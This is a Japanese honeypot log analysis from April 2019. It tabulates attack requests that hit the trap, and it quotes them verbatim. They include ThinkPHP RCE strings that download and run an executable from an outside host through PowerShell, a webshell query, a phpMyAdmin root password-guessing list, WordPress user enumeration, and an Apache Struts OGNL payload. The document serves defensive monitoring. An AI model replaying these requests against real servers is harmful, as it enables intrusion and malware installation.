| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo%20^>hydra.php |
| 1 | ThinkPHPに関する攻撃 | GET /public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe |
| 1 | ThinkPHPに関する攻撃 | GET /public/hydra.php?xcmd=cmd.exe%20/c%20powershell%20(new-object%20System.Net.WebClient).DownloadFile('hxxp://fid.hognoob[.]se/download.exe','C:/Windows/temp/iqvaiqxsywjnwem15275.exe');start%20C:/Windows/temp/iqvaiqxsywjnwem15275.exe |
| 1 | WordPressに関する調査 | GET /wp-login.php |
| 1 | WordPressのユーザー情報の取得 | GET ///?author=1 |
| 1 | WordPressのユーザー情報の取得 | GET ///wp-json/wp/v2/users/ |
| 1 | WordPressのユーザー情報の取得 | GET /wp-json/wp/v2/users/ |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=168168&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=MySQL&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=Ucloud.cn&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=access&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=admin&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=admin123&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=apache&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=autoset&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=database&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=huweishen.com&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=master&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=mysql&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=mysql123&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=oracle&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=r00t&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=redhat&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=root&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=toor&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=user&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=wdlinux.cn&server=1 |
| 1 | phpMyAdminに関する攻撃 | GET /pmamy2/index.php?pma_username=root&pma_password=websoft9&server=1 |
| 1 | phpMyAdminに関する調査 | GET /pmamy2/index.php |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmy/scripts/setup.php |
| 1 | アクセス | HEAD / |
| 1 | VOIPに関する調査 | GET /aastra/ |
| 1 | VOIPに関する調査 | GET /configs/ |
| 1 | VOIPに関する調査 | GET /gs/ |
| 1 | VOIPに関する調査 | GET /lib/ |
| 1 | VOIPに関する調査 | GET /polycom/ |
| 1 | VOIPに関する調査 | GET /provision/ |
| 1 | VOIPに関する調査 | GET /provisioning/ |
| 1 | VOIPに関する調査 | GET /spa/ |
| 1 | VOIPに関する調査 | GET /spa2102/ |
| 1 | VOIPに関する調査 | GET /tftp/ |
| 1 | VOIPに関する調査 | GET /voip_provisioning/ |
| 1 | VOIPに関する調査 | GET /xmlservices/ |
| 1 | WebDAVに関する調査 | GET /webdav/ |
| 1 | 不明 | PROPFIND / |
BW-Potのログ分析 (2019/04/16)
本日の総アクセス件数は149件です。送信元IP数は69IPです。
・Apache Strutsの脆弱性調査と思われる通信を観測
どうやら以下の三つの脆弱性に関する調査のようです
・CVE-2013-2251
・CVE-2017-5638
・CVE-2018-11776
リクエスト
Post / redirect:${#zzz=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#zzz.getWriter().print("xxxfind"),#zzz.getWriter().print("xxx"),#zzz.getWriter().flush(),#zzz.getWriter().close()}
| 件数 | 種別 | リクエスト |
| 62 | アクセス | GET / |
| 72 | phpMyAdminに関する攻撃 | POST /phpmyadmin/ |
| 62 | アクセス | GET / |
| 3 | 不正中継の調査 | GET www.baidu[.]com/ |
| 1 | 不正中継の調査 | GET api.huobi[.]pro/market/detail?symbol=ethusdt |
| 1 | 不正中継の調査 | POST 159.89.182[.]124/tmUnblock.cgi |
| 1 | Apache Strutsに関する調査 | POST / |
| 1 | DFindによるスキャン | GET /w00tw00t.at.ISC.SANS.DFind:) |
| 1 | Tomcat管理ページへのブルートフォース攻撃 | GET /manager/html |
| 1 | phpMyAdminに関する調査 | GET /MyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /myadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpMyAdmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /phpmyadmin/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /pma/scripts/setup.php |
| 1 | phpMyAdminに関する調査 | GET /w00tw00t.at.blackhats.romanian.anti-sec:) |
| 1 | 不明 | GET /admin/connection/ |
参考リンク
